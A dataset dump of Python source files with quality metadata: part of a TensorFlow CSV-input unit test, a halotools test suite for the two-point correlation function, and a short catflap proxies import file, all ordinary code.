super(CSVInputTest, self).__init__(methodName=methodName)
self._input_path = 'data/test/test.csv'
self._input_path_with_quote = 'data/test/test_with_quote.csv'
@RunAsSubprocess
def test_csv_data(self):
data_config_str = """
input_fields {
input_name: 'label'
input_type: FLOAT
}
input_fields {
input_name: 'field[1-3]'
input_type: STRING
}
label_fields: 'label'
batch_size: 1024
num_epochs: 10000
prefetch_size: 32
auto_expand_input_fields: true
"""
feature_config_str = """
input_names: 'field1'
shared_names: 'field[2-3]'
feature_type: IdFeature
embedding_dim: 32
hash_bucket_size: 2000
"""
dataset_config = DatasetConfig()
text_format.Merge(data_config_str, dataset_config)
feature_config = FeatureConfig()
text_format.Merge(feature_config_str, feature_config)
feature_configs = [feature_config]
empty_config = FeatureConfig()
empty_config.CopyFrom(feature_config)
while len(empty_config.input_names) > 0:
empty_config.input_names.pop()
while len(empty_config.shared_names) > 0:
empty_config.shared_names.pop()
for input_name in feature_config.shared_names:
input_names = config_util.auto_expand_names(input_name)
for tmp_name in input_names:
tmp_config = FeatureConfig()
tmp_config.CopyFrom(empty_config)
tmp_config.input_names.append(tmp_name)
feature_configs.append(tmp_config)
train_input_fn = CSVInput(dataset_config, feature_configs,
self._input_path).create_input()
dataset = train_input_fn(mode=tf.estimator.ModeKeys.TRAIN)
iterator = dataset.make_initializable_iterator()
tf.add_to_collection(tf.GraphKeys.TABLE_INITIALIZERS, iterator.initializer)
features, labels = iterator.get_next()
init_op = tf.get_collection(tf.GraphKeys.TABLE_INITIALIZERS)
gpu_options = tf.GPUOptions(allow_growth=True)
session_config = tf.ConfigProto(
gpu_options=gpu_options,
allow_soft_placement=True,
log_device_placement=False)
with self.test_session(config=session_config) as sess:
sess.run(init_op)
feature_dict, label_dict = sess.run([features, labels])
@RunAsSubprocess
def test_csv_data_flt_to_str_exception(self):
data_config_str = """
input_fields {
input_name: 'label'
input_type: FLOAT
}
input_fields {
input_name: 'field1'
input_type: STRING
}
input_fields {
input_name: 'field[2-3]'
input_type: FLOAT
}
label_fields: 'label'
batch_size: 1024
num_epochs: 10000
prefetch_size: 32
auto_expand_input_fields: true
"""
feature_config_str = """
input_names: 'field1'
shared_names: 'field[2-3]'
feature_type: IdFeature
embedding_dim: 32
hash_bucket_size: 2000
"""
dataset_config = DatasetConfig()
text_format.Merge(data_config_str, dataset_config)
feature_config = FeatureConfig()
text_format.Merge(feature_config_str, feature_config)
feature_configs = [feature_config]
empty_config = FeatureConfig()
empty_config.CopyFrom(feature_config)
while len(empty_config.input_names) > 0:
empty_config.input_names.pop()
while len(empty_config.shared_names) > 0:
empty_config.shared_names.pop()
for input_name in feature_config.shared_names:
input_names = config_util.auto_expand_names(input_name)
for tmp_name in input_names:
tmp_config = FeatureConfig()
tmp_config.CopyFrom(empty_config)
tmp_config.input_names.append(tmp_name)
feature_configs.append(tmp_config)
train_input_fn = CSVInput(dataset_config, feature_configs,
self._input_path).create_input()
try:
dataset = train_input_fn(mode=tf.estimator.ModeKeys.TRAIN) # noqa: F841
passed = True
except Exception:
passed = False
assert not passed, 'if precision is not set, exception should be reported in convert float to string'
@RunAsSubprocess
def test_csv_data_flt_to_str(self):
data_config_str = """
input_fields {
input_name: 'label'
input_type: FLOAT
}
input_fields {
input_name: 'field1'
input_type: STRING
}
input_fields {
input_name: 'field[2-3]'
input_type: FLOAT
}
label_fields: 'label'
batch_size: 1024
num_epochs: 10000
prefetch_size: 32
auto_expand_input_fields: true
"""
feature_config_str = """
input_names: 'field1'
shared_names: 'field[2-3]'
feature_type: IdFeature
embedding_dim: 32
hash_bucket_size: 2000
precision: 3
"""
dataset_config = DatasetConfig()
text_format.Merge(data_config_str, dataset_config)
feature_config = FeatureConfig()
text_format.Merge(feature_config_str, feature_config)
feature_configs = [feature_config]
empty_config = FeatureConfig()
empty_config.CopyFrom(feature_config)
while len(empty_config.input_names) > 0:
empty_config.input_names.pop()
while len(empty_config.shared_names) > 0:
empty_config.shared_names.pop()
for input_name in feature_config.shared_names:
input_names = config_util.auto_expand_names(input_name)
for tmp_name in input_names:
tmp_config = FeatureConfig()
tmp_config.CopyFrom(empty_config)
tmp_config.input_names.append(tmp_name)
feature_configs.append(tmp_config)
train_input_fn = CSVInput(dataset_config, feature_configs,
self._input_path).create_input()
dataset = train_input_fn(mode=tf.estimator.ModeKeys.TRAIN)
iterator = dataset.make_initializable_iterator()
tf.add_to_collection(tf.GraphKeys.TABLE_INITIALIZERS, iterator.initializer)
features, labels = iterator.get_next()
init_op = tf.get_collection(tf.GraphKeys.TABLE_INITIALIZERS)
gpu_options = tf.GPUOptions(allow_growth=True)
session_config = tf.ConfigProto(
gpu_options=gpu_options,
allow_soft_placement=True,
log_device_placement=False)
with self.test_session(config=session_config) as sess:
sess.run(init_op)
feature_dict, label_dict = sess.run([features, labels])
@RunAsSubprocess
def test_csv_input_ex(self):
data_config_str = """
input_fields {
input_name: 'label'
input_type: FLOAT
}
input_fields {
input_name: 'field[1-3]'
input_type: STRING
}
label_fields: 'label'
batch_size: 1024
num_epochs: 10000
prefetch_size: 32
auto_expand_input_fields: true
"""
feature_config_str = """
input_names: 'field1'
shared_names: 'field[2-3]'
feature_type: IdFeature
embedding_dim: 32
hash_bucket_size: 2000
"""
dataset_config = DatasetConfig()
text_format.Merge(data_config_str, dataset_config)
feature_config = FeatureConfig()
text_format.Merge(feature_config_str, feature_config)
feature_configs = [feature_config]
empty_config = FeatureConfig()
empty_config.CopyFrom(feature_config)
while len(empty_config.input_names) > 0:
empty_config.input_names.pop()
while len(empty_config.shared_names) > 0:
empty_config.shared_names.pop()
for input_name in feature_config.shared_names:
input_names = config_util.auto_expand_names(input_name)
for tmp_name in input_names:
tmp_config = FeatureConfig()
tmp_config.CopyFrom(empty_config)
tmp_config.input_names.append(tmp_name)
feature_configs.append(tmp_config)
train_input_fn = CSVInputEx(dataset_config, feature_configs,
self._input_path_with_quote).create_input()
dataset = train_input_fn(mode=tf.estimator.ModeKeys.TRAIN)
iterator = dataset.make_initializable_iterator()
tf.add_to_collection(tf.GraphKeys.TABLE_INITIALIZERS, iterator.initializer)
features, labels = iterator.get_next()
init_op = tf.get_collection(tf.GraphKeys.TABLE_INITIALIZERS)
gpu_options = tf.GPUOptions(allow_growth=True)
session_config = tf.ConfigProto(
gpu_options=gpu_options,
allow_soft_placement=True,
log_device_placement=False)
with self.test_session(config=session_config) as sess:
sess.run(init_op)
feature_dict, label_dict = sess.run([features, labels])
@RunAsSubprocess
def test_csv_data_ignore_error(self):
data_config_str = """
input_fields {
input_name: 'label'
input_type: FLOAT
}
input_fields {
input_name: 'field[1-3]'
input_type: STRING
}
label_fields: 'label'
batch_size: 32
num_epochs: 10000
prefetch_size: 32
auto_expand_input_fields: true
ignore_error: true
"""
feature_config_str = """
input_names: 'field1'
shared_names: 'field[2-3]'
feature_type: IdFeature
embedding_dim: 32
hash_bucket_size: 2000
"""
dataset_config = DatasetConfig()
text_format.Merge(data_config_str, dataset_config)
feature_config = FeatureConfig()
text_format.Merge(feature_config_str, feature_config)
feature_configs = [feature_config]
empty_config = FeatureConfig()
empty_config.CopyFrom(feature_config)
while len(empty_config.input_names) > 0:
empty_config.input_names.pop()
while len(empty_config.shared_names) > 0:
empty_config.shared_names.pop()
for input_name in feature_config.shared_names:
input_names = config_util.auto_expand_names(input_name)
for tmp_name in input_names:
tmp_config = FeatureConfig()
tmp_config.CopyFrom(empty_config)
tmp_config.input_names.append(tmp_name)
feature_configs.append(tmp_config)
train_input_fn = CSVInput(dataset_config, feature_configs,
self._input_path_with_quote).create_input()
dataset = train_input_fn(mode=tf.estimator.ModeKeys.TRAIN)
iterator = dataset.make_initializable_iterator()
tf.add_to_collection(tf.GraphKeys.TABLE_INITIALIZERS, iterator.initializer)
features, labels = iterator.get_next()
init_op = tf.get_collection(tf.GraphKeys.TABLE_INITIALIZERS)
gpu_options = tf.GPUOptions(allow_growth=True)
session_config = tf.ConfigProto(
gpu_options=gpu_options,
allow_soft_placement=True,
log_device_placement=False)
with self.test_session(config=session_config) as sess:
sess.run(init_op)
feature_dict, label_dict = sess.run([features, labels])
if __name__ == '__main__':
tf.test.main()
avg_line_length: 35.018237 | max_line_length: 105 | alphanum_fraction: 0.700026
qsc_*_quality_signal (raw values, schema order): 1,438 | 11,521 | 5.235744 | 0.112656 | 0.06216 | 0.031877 | 0.031877 | 0.899987 | 0.881259 | 0.881259 | 0.87329 | 0.867313 | 0.861071 | 0 | 0.014381 | 0.215346 | 11,521 | 328 | 106 | 35.125 | 0.818473 | 0.01111 | 0 | 0.85342 | 0 | 0 | 0.234519 | 0.013527 | 0 | 0 | 0 | 0 | 0.003257 | 1 | 0.019544 | false | 0.009772 | 0.029316 | 0 | 0.052117 | 0
qsc_* filter flags (schema order): 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 7
Row 7: hexsha=57b24aba25dd0d2d6139acf8687233cee556ccd7 | size=21,944 | ext=py | lang=Python
max_stars_repo: path=halotools/mock_observables/two_point_clustering/tests/test_tpcf.py | name=pllim/halotools | head_hexsha=6499cff09e7e0f169e4f425ee265403f6be816e8 | licenses=["BSD-3-Clause"] | count=83 | event: min=2015-01-15T14:54:16.000Z, max=2021-12-09T11:28:02.000Z
max_issues_repo: path=halotools/mock_observables/two_point_clustering/tests/test_tpcf.py | name=pllim/halotools | head_hexsha=6499cff09e7e0f169e4f425ee265403f6be816e8 | licenses=["BSD-3-Clause"] | count=579 | event: min=2015-01-14T15:57:37.000Z, max=2022-01-13T18:58:44.000Z
max_forks_repo: path=halotools/mock_observables/two_point_clustering/tests/test_tpcf.py | name=pllim/halotools | head_hexsha=6499cff09e7e0f169e4f425ee265403f6be816e8 | licenses=["BSD-3-Clause"] | count=70 | event: min=2015-01-14T15:15:58.000Z, max=2021-12-22T18:18:31.000Z
content:
""" Module providing unit-testing for the `~halotools.mock_observables.tpcf` function.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
import warnings
import pytest
from astropy.utils.misc import NumpyRNGContext
from .locate_external_unit_testing_data import tpcf_corrfunc_comparison_files_exist
from ..tpcf import tpcf
from ....custom_exceptions import HalotoolsError
slow = pytest.mark.slow
__all__ = ('test_tpcf_auto', 'test_tpcf_cross', 'test_tpcf_estimators',
'test_tpcf_sample_size_limit', 'test_tpcf_randoms',
'test_tpcf_period_API', 'test_tpcf_cross_consistency_w_auto')
fixed_seed = 43
TPCF_CORRFUNC_FILES_EXIST = tpcf_corrfunc_comparison_files_exist()
@slow
def test_tpcf_auto():
"""
test the tpcf auto-correlation functionality
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
# with randoms
result = tpcf(sample1, rbins, sample2=None,
randoms=randoms, period=None,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
assert result.ndim == 1, "More than one correlation function returned erroneously."
# with out randoms
result = tpcf(sample1, rbins, sample2=None,
randoms=None, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax], num_threads=1)
assert result.ndim == 1, "More than one correlation function returned erroneously."
@slow
def test_tpcf_cross():
"""
test the tpcf cross-correlation functionality
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((100, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
# with randoms
result = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=None,
estimator='Natural', do_auto=False,
approx_cell1_size=[rmax, rmax, rmax])
assert result.ndim == 1, "More than one correlation function returned erroneously."
# with out randoms
result = tpcf(sample1, rbins, sample2=sample2,
randoms=None, period=period,
estimator='Natural', do_auto=False,
approx_cell1_size=[rmax, rmax, rmax])
assert result.ndim == 1, "More than one correlation function returned erroneously."
@slow
def test_tpcf_estimators():
"""
test the tpcf different estimators functionality
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((100, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
result_1 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=None,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
result_2 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=None,
estimator='Davis-Peebles',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
result_3 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=None,
estimator='Hewett',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
result_4 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=None,
estimator='Hamilton',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
result_5 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=None,
estimator='Landy-Szalay',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
assert len(result_1) == 3, "wrong number of correlation functions returned erroneously."
assert len(result_2) == 3, "wrong number of correlation functions returned erroneously."
assert len(result_3) == 3, "wrong number of correlation functions returned erroneously."
assert len(result_4) == 3, "wrong number of correlation functions returned erroneously."
assert len(result_5) == 3, "wrong number of correlation functions returned erroneously."
@slow
def test_tpcf_randoms():
"""
test the tpcf possible randoms + PBCs combinations
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((100, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
# No PBCs w/ randoms
result_1 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=None,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
# PBCs w/o randoms
result_2 = tpcf(sample1, rbins, sample2=sample2,
randoms=None, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
# PBCs w/ randoms
result_3 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
# No PBCs and no randoms should throw an error.
with pytest.raises(ValueError) as err:
tpcf(sample1, rbins, sample2=sample2,
randoms=None, period=None,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
substr = "If no PBCs are specified, randoms must be provided."
assert substr in err.value.args[0]
assert len(result_1) == 3, "wrong number of correlation functions returned erroneously."
assert len(result_2) == 3, "wrong number of correlation functions returned erroneously."
assert len(result_3) == 3, "wrong number of correlation functions returned erroneously."
@slow
def test_tpcf_period_API():
"""
test the tpcf period API functionality.
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
result_1 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
period = 1.0
result_2 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
# should throw an error. period must be positive!
period = np.array([1.0, 1.0, -1.0])
with pytest.raises(ValueError) as err:
tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
substr = "All values must bounded positive numbers."
assert substr in err.value.args[0]
assert len(result_1) == 3, "wrong number of correlation functions returned erroneously."
assert len(result_2) == 3, "wrong number of correlation functions returned erroneously."
@slow
def test_tpcf_cross_consistency_w_auto():
"""
test the tpcf cross-correlation mode consistency with auto-correlation mode
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((200, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((300, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
# with out randoms
result1 = tpcf(sample1, rbins, sample2=None,
randoms=None, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
result2 = tpcf(sample2, rbins, sample2=None,
randoms=None, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
result1_p, result12, result2_p = tpcf(sample1, rbins, sample2=sample2,
randoms=None, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
assert np.allclose(result1, result1_p), "cross mode and auto mode are not the same"
assert np.allclose(result2, result2_p), "cross mode and auto mode are not the same"
# with randoms
result1 = tpcf(sample1, rbins, sample2=None,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
result2 = tpcf(sample2, rbins, sample2=None,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
result1_p, result12, result2_p = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
assert np.allclose(result1, result1_p), "cross mode and auto mode are not the same"
assert np.allclose(result2, result2_p), "cross mode and auto mode are not the same"
def test_RR_precomputed_exception_handling1():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
RR_precomputed = rmax
with pytest.raises(HalotoolsError) as err:
_ = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
RR_precomputed=RR_precomputed)
substr = "``RR_precomputed`` and ``NR_precomputed`` arguments, or neither\n"
assert substr in err.value.args[0]
def test_RR_precomputed_exception_handling2():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
RR_precomputed = rbins[:-2]
NR_precomputed = randoms.shape[0]
with pytest.raises(HalotoolsError) as err:
_ = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
RR_precomputed=RR_precomputed, NR_precomputed=NR_precomputed)
substr = "\nLength of ``RR_precomputed`` must match length of ``rbins``\n"
assert substr in err.value.args[0]
def test_RR_precomputed_exception_handling3():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
RR_precomputed = rbins[:-1]
NR_precomputed = 5
with pytest.raises(HalotoolsError) as err:
_ = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
RR_precomputed=RR_precomputed, NR_precomputed=NR_precomputed)
substr = "the value of NR_precomputed must agree with the number of randoms"
assert substr in err.value.args[0]
@slow
def test_RR_precomputed_natural_estimator_auto():
""" Strategy here is as follows. First, we adopt the same setup
with randomly generated points as used in the rest of the test suite.
First, we just compute the tpcf in the normal way.
Then we break apart the tpcf innards so that we can
compute RR in the exact same way that it is computed within tpcf.
We will then pass in this RR using the RR_precomputed keyword,
and verify that the tpcf computed in this second way gives
exactly the same results as if we did not pre-compute RR.
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = sample1
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
approx_cell1_size = [rmax, rmax, rmax]
approx_cell2_size = approx_cell1_size
approx_cellran_size = [rmax, rmax, rmax]
normal_result = tpcf(
sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=approx_cell1_size,
approx_cellran_size=approx_cellran_size)
# The following quantities are computed inside the
# tpcf namespace. We reproduce them here because they are
# necessary inputs to the _random_counts and _pair_counts
# functions called by tpcf
_sample1_is_sample2 = True
PBCs = True
num_threads = 1
do_DD, do_DR, do_RR = True, True, True
do_auto, do_cross = True, False
from ..tpcf import _random_counts, _pair_counts
# count data pairs
D1D1, D1D2, D2D2 = _pair_counts(
sample1, sample2, rbins, period,
num_threads, do_auto, do_cross, _sample1_is_sample2,
approx_cell1_size, approx_cell2_size)
# count random pairs
D1R, D2R, RR = _random_counts(
sample1, sample2, randoms, rbins, period,
PBCs, num_threads, do_RR, do_DR, _sample1_is_sample2,
approx_cell1_size, approx_cell2_size, approx_cellran_size)
N1 = len(sample1)
NR = len(randoms)
factor = N1*N1/(NR*NR)
def mult(x, y):
return x*y
xi_11 = mult(1.0/factor, D1D1/RR) - 1.0
# The following assertion implies that the RR
# computed within this testing namespace is the same RR
# as computed in the tpcf namespace
assert np.all(xi_11 == normal_result)
# Now we will pass in the above RR as an argument
# and verify that we get an identical tpcf
result_with_RR_precomputed = tpcf(
sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=approx_cell1_size,
approx_cellran_size=approx_cellran_size,
RR_precomputed=RR,
NR_precomputed=NR)
assert np.all(result_with_RR_precomputed == normal_result)
@slow
def test_RR_precomputed_Landy_Szalay_estimator_auto():
""" Strategy here is as follows. First, we adopt the same setup
with randomly generated points as used in the rest of the test suite.
First, we just compute the tpcf in the normal way.
Then we break apart the tpcf innards so that we can
compute RR in the exact same way that it is computed within tpcf.
We will then pass in this RR using the RR_precomputed keyword,
and verify that the tpcf computed in this second way gives
exactly the same results as if we did not pre-compute RR.
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = sample1
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
approx_cell1_size = [rmax, rmax, rmax]
approx_cell2_size = approx_cell1_size
approx_cellran_size = [rmax, rmax, rmax]
normal_result = tpcf(
sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Landy-Szalay',
approx_cell1_size=approx_cell1_size,
approx_cellran_size=approx_cellran_size)
# The following quantities are computed inside the
# tpcf namespace. We reproduce them here because they are
# necessary inputs to the _random_counts and _pair_counts
# functions called by tpcf
_sample1_is_sample2 = True
PBCs = True
num_threads = 1
do_DD, do_DR, do_RR = True, True, True
do_auto, do_cross = True, False
from ..tpcf import _random_counts, _pair_counts
# count data pairs
D1D1, D1D2, D2D2 = _pair_counts(
sample1, sample2, rbins, period,
num_threads, do_auto, do_cross, _sample1_is_sample2,
approx_cell1_size, approx_cell2_size)
# count random pairs
D1R, D2R, RR = _random_counts(
sample1, sample2, randoms, rbins, period,
PBCs, num_threads, do_RR, do_DR, _sample1_is_sample2,
approx_cell1_size, approx_cell2_size, approx_cellran_size)
ND1 = len(sample1)
ND2 = len(sample2)
NR1 = len(randoms)
NR2 = len(randoms)
factor1 = ND1*ND2/(NR1*NR2)
factor2 = ND1*NR2/(NR1*NR2)
def mult(x, y):
return x*y
xi_11 = mult(1.0/factor1, D1D1/RR) - mult(1.0/factor2, 2.0*D1R/RR) + 1.0
# # The following assertion implies that the RR
# # computed within this testing namespace is the same RR
# # as computed in the tpcf namespace
assert np.all(xi_11 == normal_result)
# Now we will pass in the above RR as an argument
# and verify that we get an identical tpcf
result_with_RR_precomputed = tpcf(
sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Landy-Szalay',
approx_cell1_size=approx_cell1_size,
approx_cellran_size=approx_cellran_size,
RR_precomputed=RR,
NR_precomputed=NR1)
assert np.all(result_with_RR_precomputed == normal_result)
def test_tpcf_raises_exception_for_non_monotonic_rbins():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(10, 0.3, 5)
with pytest.raises(TypeError) as err:
normal_result = tpcf(sample1, rbins, period=period)
substr = "Input separation bins must be a monotonically increasing"
assert substr in err.value.args[0]
def test_tpcf_raises_exception_for_large_search_length():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.1, 0.5, 5)
with pytest.raises(ValueError) as err:
normal_result = tpcf(sample1, rbins, period=period)
substr = "Either decrease your search length or use a larger simulation"
assert substr in err.value.args[0]
def test_tpcf_raises_exception_for_incompatible_data_shapes():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = np.random.random((1000, 2))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.1, 0.3, 5)
with pytest.raises(TypeError) as err:
normal_result = tpcf(sample1, rbins, sample2=sample2, period=period)
substr = "Input sample of points must be a Numpy ndarray of shape (Npts, 3)."
assert substr in err.value.args[0]
def test_tpcf_raises_exception_for_bad_do_auto_instructions():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = np.random.random((1000, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.1, 0.3, 5)
with pytest.raises(ValueError) as err:
normal_result = tpcf(sample1, rbins, sample2=sample2, period=period,
do_auto='Jose Canseco')
substr = "`do_auto` and `do_cross` keywords must be boolean-valued."
assert substr in err.value.args[0]
def test_tpcf_raises_exception_for_unavailable_estimator():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = np.random.random((1000, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.1, 0.3, 5)
with pytest.raises(ValueError) as err:
normal_result = tpcf(sample1, rbins, period=period,
estimator='Jose Canseco')
substr = "is not in the list of available estimators:"
assert substr in err.value.args[0]
@pytest.mark.skipif('not TPCF_CORRFUNC_FILES_EXIST')
def test_tpcf_vs_corrfunc():
"""
"""
msg = ("This unit-test compares the tpcf results from halotools \n"
"against the results derived from the Corrfunc code managed by \n"
"Manodeep Sinha. ")
__, aph_fname1, aph_fname2, aph_fname3, deep_fname1, deep_fname2 = (
tpcf_corrfunc_comparison_files_exist(return_fnames=True))
sinha_sample1_xi = np.load(deep_fname1)[:, 0]
sinha_sample2_xi = np.load(deep_fname2)[:, 0]
sample1 = np.load(aph_fname1)
sample2 = np.load(aph_fname2)
rbins = np.load(aph_fname3)
halotools_result1 = tpcf(sample1, rbins, period=250.0)
assert np.allclose(halotools_result1, sinha_sample1_xi, rtol=1e-5), msg
halotools_result2 = tpcf(sample2, rbins, period=250.0)
assert np.allclose(halotools_result2, sinha_sample2_xi, rtol=1e-5), msg
avg_line_length: 37.704467 | max_line_length: 92 | alphanum_fraction: 0.641497
qsc_*_quality_signal (raw values, schema order): 2,873 | 21,944 | 4.737208 | 0.104769 | 0.045849 | 0.045187 | 0.045849 | 0.843718 | 0.822998 | 0.816752 | 0.81205 | 0.798604 | 0.789493 | 0 | 0.044816 | 0.256699 | 21,944 | 581 | 93 | 37.769363 | 0.78959 | 0.112969 | 0 | 0.764706 | 0 | 0 | 0.109529 | 0.004468 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.046569 | false | 0 | 0.02451 | 0.004902 | 0.07598 | 0.002451
qsc_* filter flags (schema order): 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 7
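Like row 1, rows 6 and 7 are flagged on duplication, here via frac_lines_dupe_lines (0.85342 and 0.764706 respectively): repetitive test boilerplate repeats whole lines. A sketch of one plausible definition of that signal (the pipeline's exact normalization, e.g. whether blank lines count, isn't given here):

```python
from collections import Counter

def frac_lines_dupe_lines(text: str) -> float:
    """Fraction of non-empty, stripped lines that occur more than once."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    counts = Counter(lines)
    dupes = sum(c for c in counts.values() if c > 1)
    return dupes / len(lines) if lines else 0.0
```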
Row 8: hexsha=17caa1453c4a2473d5c321f75d4d6a5f0c0d296e | size=132 | ext=py | lang=Python
max_stars_repo: path=catflap/proxies/__init__.py | name=yay4ya/catflap | head_hexsha=1cb146417948c4c60c4765287c6f62664058290b | licenses=["MIT"] | count=null | event: min=null, max=null
max_issues_repo: path=catflap/proxies/__init__.py | name=yay4ya/catflap | head_hexsha=1cb146417948c4c60c4765287c6f62664058290b | licenses=["MIT"] | count=null | event: min=null, max=null
max_forks_repo: path=catflap/proxies/__init__.py | name=yay4ya/catflap | head_hexsha=1cb146417948c4c60c4765287c6f62664058290b | licenses=["MIT"] | count=1 | event: min=2020-06-30T15:56:07.000Z, max=2020-06-30T15:56:07.000Z
content:
from catflap.proxies.proxy import Proxy
from catflap.proxies.slack import SlackProxy
from catflap.proxies.stdout import StdoutProxy
avg_line_length: 33 | max_line_length: 46 | alphanum_fraction: 0.863636
